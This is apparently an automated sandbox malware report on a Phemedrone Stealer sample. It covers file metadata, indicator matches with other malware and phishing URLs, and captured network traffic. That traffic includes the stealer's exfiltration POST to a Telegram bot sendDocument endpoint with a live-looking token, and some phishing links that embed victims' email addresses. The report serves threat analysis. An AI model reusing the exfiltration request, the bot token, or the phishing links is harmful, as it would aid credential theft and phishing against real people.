                                                                              https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bg%C2%ADloba%C2%ADlproc%C2%ADessi%C2%ADngne%C2%ADtwo%C2%ADrk%2E%E2%80%8Bne%C2%ADt%2Ffghd%2Fgfjfjfg%2FBpORLlSyDHhQozoQ5XBZtBNm/dGhvbHplckByZGd1c2EuY29tGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
Match | Associated Sample Name / URL | Detection | Threat Name | Context
get.geojs.io | rukT6hBo6P.exe | malicious | Phemedrone Stealer | 172.67.70.233
 | gCK3ozTL7Q.ps1 | malicious | Phemedrone Stealer | 172.67.70.233
 | Activation.exe | malicious | Phemedrone Stealer | 104.26.1.100
 | ZOL2mIYAUH.exe | malicious | Phemedrone Stealer, PureLog Stealer, XWorm, zgRAT | 104.26.0.100
 | WDSecureUtilities(1).exe | malicious | Phemedrone Stealer | 104.26.1.100
 | system.exe | malicious | Phemedrone Stealer | 172.67.70.233
 | B6EGeOHEFm.exe | malicious | Phemedrone Stealer | 104.26.1.100
 | Q60ZbERXWZ.exe | malicious | Phemedrone Stealer | 104.26.1.100
 | nuVM6HVKRG.exe | malicious | Phemedrone Stealer | 104.26.1.100
 | XCubQJqiz7.exe | malicious | Phemedrone Stealer | 104.26.1.100
api.telegram.org | https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/ipfs/bafybeidf2ghv5vakeqlcqqvzfsett7uzseqmmutnuaestozqiouef2rq2y#XFrank.Albano@lcatterton.com | malicious | HTMLPhisher | 149.154.167.220
 | Confirm revised invoice to proceed with payment ASAP.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
 | 17338478743bbe929069f09b2fd43b475a3f9c5d7b9e72f9a2a5695318d73f4c494b80d40d501.dat-decoded.exe | malicious | SugarDump, XWorm | 149.154.167.220
 | Bank Swift and SOA PRN0072700314159453_pdf.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
 | HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | malicious | MassLogger RAT | 149.154.167.220
 | ST07933.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
 | fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
 | Hesap_Hareketleri_10122024_html.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
 | Hesap_Hareketleri_09122024_html.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
 | E-dekont.exe | malicious | MassLogger RAT | 149.154.167.220
Match | Associated Sample Name / URL | Detection | Threat Name | Context
TELEGRAMRU | https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/ipfs/bafybeidf2ghv5vakeqlcqqvzfsett7uzseqmmutnuaestozqiouef2rq2y#XFrank.Albano@lcatterton.com | malicious | HTMLPhisher | 149.154.167.220
 | Confirm revised invoice to proceed with payment ASAP.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
 | 17338478743bbe929069f09b2fd43b475a3f9c5d7b9e72f9a2a5695318d73f4c494b80d40d501.dat-decoded.exe | malicious | SugarDump, XWorm | 149.154.167.220
 | Bank Swift and SOA PRN0072700314159453_pdf.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
 | HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | malicious | MassLogger RAT | 149.154.167.220
 | ST07933.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
 | fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
 | Hesap_Hareketleri_10122024_html.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
 | Hesap_Hareketleri_09122024_html.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
 | E-dekont.exe | malicious | MassLogger RAT | 149.154.167.220
CLOUDFLARENETUS | SEejSLAS9f.exe | malicious | Stealc | 172.67.179.207
 | CJE003889.exe | malicious | FormBook | 172.67.158.81
 | https://hongkongliving.com | malicious | CAPTCHA Scam ClickFix | 104.18.33.8
 | Hays eft_Receipt number N302143235953.htm | malicious | Unknown | 104.17.25.14
 | http://dcr0eadbm64ph.cloudfront.net/IDCVt99WXiQU.exe | malicious | Poisonivy | 172.67.26.92
 | Mozi.m.elf | malicious | Mirai | 172.71.119.218
 | EbXj93v3bO.exe | malicious | Stealc | 172.67.179.207
 | EFT Remittance_(Deerequipment)CQDM.html | malicious | Unknown | 104.21.18.132
 | https://cbthz04.na1.hs-sales-engage.com/Ctc/WX+23284/cbtHZ04/JlY2-6qcW95jsWP6lZ3mVW5xSkdC387hZlVGwpQc3P-q7wW4XgB4f44hCn1W3xYp5D6c1ttLW5FlJm432C9CFN1DvHyz7sRM3W1xbpQP3rjw57VdgQ8b5y5ncrN49hcz4pvY25W96rvby79_LjyW2hcbt-9lVY_PW61b5ZB17S04cW1Q1Z0m1qr_XnW4-Nvh_3JShBfW6ZlQ2B7-rTd7W5m54Pt4FXHVhN8f7LcVPRggDW6t0wZX12kCc8W8SWxd-65BfMKN89z7Dpr6bFRW62hqfp7800yqW6mjxRN41FPzSV9Cmrg5cL__SW36PjDN1zwkS6W21jP9H8v9kL6W995dJp10hcCRVsGjCC5n0FZjN7sg51mKQ1rDW15tQ1c3HKBShW818lp-6tdDqnf2cjw2s04 | malicious | Unknown | 104.16.117.116
 | https://on-chainevm.pages.dev | malicious | HTMLPhisher | 104.16.79.73
Match | Associated Sample Name / URL | Detection | Threat Name | Context
54328bd36c14bd82ddaa0c04b25ed9ad | file.exe | malicious | Snake Keylogger | 172.67.70.233
 | Confirm revised invoice to proceed with payment ASAP.exe | malicious | GuLoader, MassLogger RAT | 172.67.70.233
 | REQUEST FOR QUOATION AND PRICES 0108603076-24_pdf.exe | malicious | GuLoader | 172.67.70.233
 | Bank Swift and SOA PRN0072700314159453_pdf.exe | malicious | GuLoader, MassLogger RAT | 172.67.70.233
 | HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | malicious | MassLogger RAT | 172.67.70.233
 | ST07933.exe | malicious | GuLoader, Snake Keylogger | 172.67.70.233
 | fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe | malicious | Snake Keylogger, VIP Keylogger | 172.67.70.233
 | New_Order_List.exe | malicious | Snake Keylogger | 172.67.70.233
 | Price Quotation-01.dqy.dll | malicious | Snake Keylogger | 172.67.70.233
 | ORDER-6070Y689_0PF57682456_DECVC789378909740.js | malicious | WSHRat, Snake Keylogger | 172.67.70.233
3b5074b1b5d032e5620f69f9f700ff0e | Aclatis tool.exe | malicious | Unknown | 149.154.167.220
 | Aclatis tool.exe | malicious | Unknown | 149.154.167.220
 | Confirm revised invoice to proceed with payment ASAP.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
 | 751ietQPnX.lnk | malicious | RHADAMANTHYS | 149.154.167.220
 | l92fYljXWF.lnk | malicious | RHADAMANTHYS | 149.154.167.220
 | qxjDerXRGR.lnk | malicious | RHADAMANTHYS | 149.154.167.220
 | taCCGTk8n1.lnk | malicious | RHADAMANTHYS | 149.154.167.220
 | Richiesta di Indagine sulla Violazione del Copyright lnk.lnk | malicious | Unknown | 149.154.167.220
 | 9coWg6ayLz.msi | malicious | Unknown | 149.154.167.220
                                                                                No context
                                                                                Process:C:\Users\user\Desktop\Itaxyhi.exe
                                                                                File Type:CSV text
                                                                                Category:dropped
                                                                                Size (bytes):1498
                                                                                Entropy (8bit):5.364175471524945
                                                                                Encrypted:false
                                                                                SSDEEP:24:ML9E4KQwKDE4KGKZI6Kha1qE4GIsCKIE4TKBGKoZAE4KKUNCsXE4NpYE4KD:MxHKQwYHKGSI6oa1qHGIsCtHTHhAHKKa
                                                                                MD5:595B106D256BBA6F8F3EE16C1CD7885C
                                                                                SHA1:32F022A507EAE88155D1B508EB469FE45F68775F
                                                                                SHA-256:1DFED58278EE4A79C88B9F481712749C1F1E3EE48EF043AC978CC958822FD000
                                                                                SHA-512:1CAE94F2D5B7C15E261491680593ACD9E7FC601851AF2BA108A2D3818CC5EB7A212D66E6060E9E792FAE611026F44A83C3D98E1D057D7E0E56F859584F539B2A
                                                                                Malicious:true
                                                                                Reputation:low
                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\
                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Entropy (8bit):5.790452966007998
                                                                                TrID:
                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                • Windows Screen Saver (13104/52) 0.07%
                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                File name:Itaxyhi.exe
                                                                                File size:119'296 bytes
                                                                                MD5:78c586522f986994aa77c466c9d678a8
                                                                                SHA1:4b9b13c3782ae532a140a33ba673dc65a37aa882
                                                                                SHA256:498ac6b747691eb456fc24ac26c3932effca9b46e39740963120f711e72aefc9
                                                                                SHA512:707ff5fcbb5e473583bec2d54aac25a3febe262c06025c9d88ddd5d30449b1454289eaa63bec848ca69147232474731052bef710e60c042d0c80e9c02486b5bb
                                                                                SSDEEP:1536:7DG01nFGLBQ+ZH3RSR9CJd6FLVTS6OSjl5eEJXopJ7xfYUCFkhTy3QFTiKCq:nFFFiMWJd6F5TnO65r+T1JQoTy3qTiY
                                                                                TLSH:A9C32A3C1AEB4D55E06F9AB7DBE9E4A9CAB5DAE34109F66A0C421ED30F16F408D03075
                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.........."...0.............~.... ........@.. .......................@............@................................
                                                                                Icon Hash:00928e8e8686b000
                                                                                Entrypoint:0x41e77e
                                                                                Entrypoint Section:.text
                                                                                Digitally signed:false
                                                                                Imagebase:0x400000
                                                                                Subsystem:windows gui
                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                Time Stamp:0x6686D59A [Thu Jul 4 17:02:18 2024 UTC]
                                                                                TLS Callbacks:
                                                                                CLR (.Net) Version:
                                                                                OS Version Major:4
                                                                                OS Version Minor:0
                                                                                File Version Major:4
                                                                                File Version Minor:0
                                                                                Subsystem Version Major:4
                                                                                Subsystem Version Minor:0
                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                Instruction
                                                                                jmp dword ptr [00402000h]
add byte ptr [eax], al   (repeated 97 times: the bytes following the 6-byte jmp are zero padding, which disassembles as add byte ptr [eax], al)
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1e724 | 0x57 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x20000 | 0x5c6 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x22000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x1c784 | 0x1c800 | 4ea16b0b7729f7cc26c4f3d24c843581 | False | 0.4702576754385965 | data | 5.828239901546038 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x20000 | 0x5c6 | 0x600 | 2bb296f99167032983d146f7bcae15f2 | False | 0.4225260416666667 | data | 4.113059661922758 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x22000 | 0xc | 0x200 | bb06170c1607bceafbf9d9f9c10fc2bd | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x200a0 | 0x33c | data | | | 0.4251207729468599
RT_MANIFEST | 0x203dc | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 11, 2024 07:31:57.517066956 CET | 56562 | 53 | 192.168.2.6 | 1.1.1.1
Dec 11, 2024 07:31:57.655122042 CET | 53 | 56562 | 1.1.1.1 | 192.168.2.6
Dec 11, 2024 07:31:59.652595043 CET | 53733 | 53 | 192.168.2.6 | 1.1.1.1
Dec 11, 2024 07:31:59.789546013 CET | 53 | 53733 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 11, 2024 07:31:57.517066956 CET | 192.168.2.6 | 1.1.1.1 | 0x7d08 | Standard query (0) | get.geojs.io | A (IP address) | IN (0x0001) | false
Dec 11, 2024 07:31:59.652595043 CET | 192.168.2.6 | 1.1.1.1 | 0x1ac | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 11, 2024 07:31:57.655122042 CET | 1.1.1.1 | 192.168.2.6 | 0x7d08 | No error (0) | get.geojs.io | | 172.67.70.233 | A (IP address) | IN (0x0001) | false
Dec 11, 2024 07:31:57.655122042 CET | 1.1.1.1 | 192.168.2.6 | 0x7d08 | No error (0) | get.geojs.io | | 104.26.1.100 | A (IP address) | IN (0x0001) | false
Dec 11, 2024 07:31:57.655122042 CET | 1.1.1.1 | 192.168.2.6 | 0x7d08 | No error (0) | get.geojs.io | | 104.26.0.100 | A (IP address) | IN (0x0001) | false
Dec 11, 2024 07:31:59.789546013 CET | 1.1.1.1 | 192.168.2.6 | 0x1ac | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
                                                                                • get.geojs.io
                                                                                • api.telegram.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49699 | 172.67.70.233 | 443 | 6504 | C:\Users\user\Desktop\Itaxyhi.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-11 06:31:58 UTC | 76 | OUT | GET /v1/ip/geo.json HTTP/1.1
                                                                                Host: get.geojs.io
                                                                                Connection: Keep-Alive
2024-12-11 06:31:59 UTC | 1128 | IN | HTTP/1.1 200 OK
                                                                                Date: Wed, 11 Dec 2024 06:31:59 GMT
                                                                                Content-Type: application/json
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                x-request-id: 5436c8a4eb8fc71da158395f52e5b518-ASH
                                                                                strict-transport-security: max-age=15552000; includeSubDomains; preload
                                                                                access-control-allow-origin: *
                                                                                access-control-allow-methods: GET
                                                                                pragma: no-cache
                                                                                Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                geojs-backend: ash-01
                                                                                CF-Cache-Status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=abbK1o2j8GVWuJk5pswdfb6%2FfTLm5A5aCnqItBDkFVMrUv4he5A0dMrR69gZ%2Bxw83wZqpa0yMTfGQMRM5SwXdeNfSU6n4vwG6%2BgSs6Y%2FL2EtxAw0%2F%2Fb70GrpjK9n9w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                X-Content-Type-Options: nosniff
                                                                                Server: cloudflare
                                                                                CF-RAY: 8f036f52cd015e68-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1608&min_rtt=1600&rtt_var=616&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2817&recv_bytes=690&delivery_rate=1752701&cwnd=214&unsent_bytes=0&cid=6ce2b6b970d6630a&ts=461&x=0"
2024-12-11 06:31:59 UTC | 241 | IN | Data Raw: 31 34 36 0d 0a 7b 22 61 72 65 61 5f 63 6f 64 65 22 3a 22 30 22 2c 22 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 5f 6e 61 6d 65 22 3a 22 4c 45 56 45 4c 33 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 33 22 3a 22 55 53 41 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 22 3a 22 4e 41 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 6c 61 74 69 74 75 64 65 22 3a 22 34 30 2e 37 35 30 33 22 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 22 2d 37 34 2e 30 30 31 34 22 2c 22 61 63 63 75 72 61 63 79 22 3a 32 30 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 5c 2f 4e 65 77 5f 59 6f 72 6b 22
                                                                                Data Ascii: 146{"area_code":"0","organization_name":"LEVEL3","country_code":"US","country_code3":"USA","continent_code":"NA","region":"New York","latitude":"40.7503","longitude":"-74.0014","accuracy":20,"city":"New York","timezone":"America\/New_York"
2024-12-11 06:31:59 UTC | 92 | IN | Data Raw: 2c 22 61 73 6e 22 3a 33 33 35 36 2c 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 37 35 22 2c 22 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 3a 22 41 53 33 33 35 36 20 4c 45 56 45 4c 33 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 7d 0a 0d 0a
                                                                                Data Ascii: ,"asn":3356,"ip":"8.46.123.175","organization":"AS3356 LEVEL3","country":"United States"}
2024-12-11 06:31:59 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49700 | 149.154.167.220 | 443 | 6504 | C:\Users\user\Desktop\Itaxyhi.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-11 06:32:01 UTC | 384 | OUT | POST /bot7105333862:AAE6XaSuAERR5F_VgpAajrgcx8b0mCmMnqM/sendDocument HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/602.37 (KHTML, like Gecko) Chrome/49.0.1422.399 Safari/600
                                                                                Content-Type: multipart/form-data; boundary=----------------------------8dd19839ab01d6d
                                                                                Host: api.telegram.org
                                                                                Content-Length: 697295
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
2024-12-11 06:32:01 UTC | 25 | IN | HTTP/1.1 100 Continue
2024-12-11 06:32:03 UTC | 1256 | IN | HTTP/1.1 200 OK
                                                                                Server: nginx/1.18.0
                                                                                Date: Wed, 11 Dec 2024 06:32:02 GMT
                                                                                Content-Type: application/json
                                                                                Content-Length: 868
                                                                                Connection: close
                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                Access-Control-Allow-Origin: *
                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                {"ok":true,"result":{"message_id":371,"from":{"id":7105333862,"is_bot":true,"first_name":"log","username":"logformy4mybot"},"chat":{"id":7235624286,"first_name":"btcat","username":"indeep12","type":"private"},"date":1733898722,"document":{"file_name":"[US]8.46.123.175-Phemedrone-Report.phem","file_id":"BQACAgIAAxkDAAIBc2dZMeJivmmfWFuyb2nSlxcrdfZ3AAI3YgACPybJSvJQOZwbcwABTjYE","file_unique_id":"AgADN2IAAj8myUo","file_size":696528},"caption":"Phemedrone Stealer Report | by @webster480 & @TheDyer\n\n - IP: 8.46.123.175 (United States)\n - Tag: Default (Itaxyhi)\n - Passwords: 0\n - Cookies: 2\n - Wallets: 0\n\n\n\n\n@freakcodingspot","caption_entities":[{"offset":0,"length":25,"type":"bold"},{"offset":31,"length":11,"type":"mention"},{"offset":45,"length":8,"type":"mention"},{"offset":55,"length":106,"type":"pre"},{"offset":165,"length":16,"type":"mention"}]}}



                                                                                Target ID:0
                                                                                Start time:01:31:55
                                                                                Start date:11/12/2024
                                                                                Path:C:\Users\user\Desktop\Itaxyhi.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Users\user\Desktop\Itaxyhi.exe"
                                                                                Imagebase:0x810000
                                                                                File size:119'296 bytes
                                                                                MD5 hash:78C586522F986994AA77C466C9D678A8
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_PhemedroneStealer, Description: Yara detected Phemedrone Stealer, Source: 00000000.00000002.2152408176.0000000002D72000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_PhemedroneStealer, Description: Yara detected Phemedrone Stealer, Source: 00000000.00000002.2152408176.0000000002D9D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_PhemedroneStealer, Description: Yara detected Phemedrone Stealer, Source: 00000000.00000002.2152408176.0000000002C12000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_GenericStealer_9, Description: Yara detected Generic Stealer, Source: 00000000.00000002.2152408176.0000000002C12000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_PhemedroneStealer, Description: Yara detected Phemedrone Stealer, Source: 00000000.00000002.2152408176.0000000002DAF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_PhemedroneStealer, Description: Yara detected Phemedrone Stealer, Source: 00000000.00000002.2152408176.0000000002C32000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:low
                                                                                Has exited:true


                                                                                  Execution Graph

                                                                                  Execution Coverage:14.2%
                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                  Signature Coverage:27.8%
                                                                                  Total number of Nodes:18
                                                                                  Total number of Limit Nodes:1
                                                                                  execution_graph 16007 7ffd34891d9a 16008 7ffd3489b7b0 LoadLibraryA 16007->16008 16010 7ffd3489b904 16008->16010 16004 7ffd3489d25c 16005 7ffd3489b6f0 LoadLibraryA 16004->16005 16006 7ffd3489d261 16005->16006 15999 7ffd3489bf3d 16000 7ffd3489bf5f 15999->16000 16001 7ffd3489c041 16000->16001 16002 7ffd3489c28c CryptUnprotectData 16000->16002 16003 7ffd3489c2d9 16002->16003 15991 7ffd3489cb9f 15994 7ffd3489b6f0 15991->15994 15993 7ffd3489cba4 15995 7ffd3489b709 15994->15995 15996 7ffd3489b70e 15995->15996 15997 7ffd3489b8b0 LoadLibraryA 15995->15997 15996->15993 15998 7ffd3489b904 15997->15998 15998->15993
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2154568238.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd34890000_Itaxyhi.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: _M_H
                                                                                  • API String ID: 0-2404144706
                                                                                  • Opcode ID: 7bac4b70063e00028ca4f950c967357f477bdb9b1e6edcfadbbf40b614e6da0c
                                                                                  • Instruction ID: a774fe1c8a3cf9f1a3fbf2331862e13feafed81d214d019c76a046817f1e80d2
                                                                                  • Opcode Fuzzy Hash: 7bac4b70063e00028ca4f950c967357f477bdb9b1e6edcfadbbf40b614e6da0c
                                                                                  • Instruction Fuzzy Hash: 6E926F30609A4A8FDBD4EF2CC4A4BA937E1FF5A310F1405B9E44EC7292CA79E855DB50


                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 957 7ffd34891d9a-7ffd3489b82c 963 7ffd3489b82e-7ffd3489b855 957->963 964 7ffd3489b89f-7ffd3489b902 LoadLibraryA 957->964 963->964 967 7ffd3489b857-7ffd3489b85a 963->967 968 7ffd3489b90a-7ffd3489b946 call 7ffd3489b962 964->968 969 7ffd3489b904 964->969 970 7ffd3489b85c-7ffd3489b86f 967->970 971 7ffd3489b894-7ffd3489b89c 967->971 979 7ffd3489b948 968->979 980 7ffd3489b94d-7ffd3489b961 968->980 969->968 973 7ffd3489b871 970->973 974 7ffd3489b873-7ffd3489b886 970->974 971->964 973->974 974->974 976 7ffd3489b888-7ffd3489b890 974->976 976->971 979->980
                                                                                  APIs
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID:
                                                                                  • API String ID: 1029625771-0
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: db8888e753c8378e921f4df98d14a8ca3776fe38e2df5d21c5a42ea6d79c65af
                                                                                  • Instruction ID: e0dfafd910886eb79dd54577b5d15763326340341380bfa20b4425912a9d3cd7
                                                                                  • Opcode Fuzzy Hash: db8888e753c8378e921f4df98d14a8ca3776fe38e2df5d21c5a42ea6d79c65af
                                                                                  • Instruction Fuzzy Hash: 4471D767B0DA921BE352A7AC6CB60DA7F94EF5337970900B7C298CB193ED1C34075692
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2154568238.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd34890000_Itaxyhi.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 5fba8f53df7d25f47ae1d7973cadec7b5266b783479022db695bb64cb902849f
                                                                                  • Instruction ID: 91485063f5ce26a5a6af6998c94d4522292aa2e4aea4c3e719e1547e77940b0c
                                                                                  • Opcode Fuzzy Hash: 5fba8f53df7d25f47ae1d7973cadec7b5266b783479022db695bb64cb902849f
                                                                                  • Instruction Fuzzy Hash: F4716617A0D6D22BD722A77C68F61DA3FA4DE8337570D41F7D188CF093E91C644A9292
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2154568238.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd34890000_Itaxyhi.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 462b105f366e6832f06827270aba95fcff0877c214c04ce996d9180b3d1319ce
                                                                                  • Instruction ID: 8aa271d071975c82d7985c28a4522f40957eac1b44443f654812b55ee1228a3e
